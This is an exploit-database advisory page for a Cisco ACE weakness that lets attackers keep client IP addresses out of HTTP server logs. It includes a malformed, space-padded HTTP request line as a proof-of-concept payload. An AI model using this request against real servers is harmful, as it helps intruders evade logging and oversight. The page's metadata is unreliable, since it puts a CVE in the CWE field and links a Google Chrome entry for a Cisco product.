header-logo
Suggest Exploit
vendor:
Cisco Application Control Engine (ACE)
by:
Unknown
4.3
CVSS
MEDIUM
HTTP Server Log Obfuscation
200
CWE
Product Name: Cisco Application Control Engine (ACE)
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-3111
CPE: a:cisco:application_control_engine_software
Metasploit: https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2010-3111/
Other Scripts:
Platforms Tested:
Unknown

Cisco ACE HTTP Server Log Obfuscation

The Cisco ACE is prone to a security weakness that allows attackers to obfuscate HTTP server log entries. Attackers can exploit this issue to avoid having client IP addresses logged by servers.

Mitigation:

Apply the appropriate updates provided by the vendor to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40002/info

Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.

Attackers can exploit this issue to avoid having client IP addresses logged by servers. 

GET / HTTP / 1 . 1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

GET / HTTP/1.1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

Navigation

Suggest Exploit

Services By CQR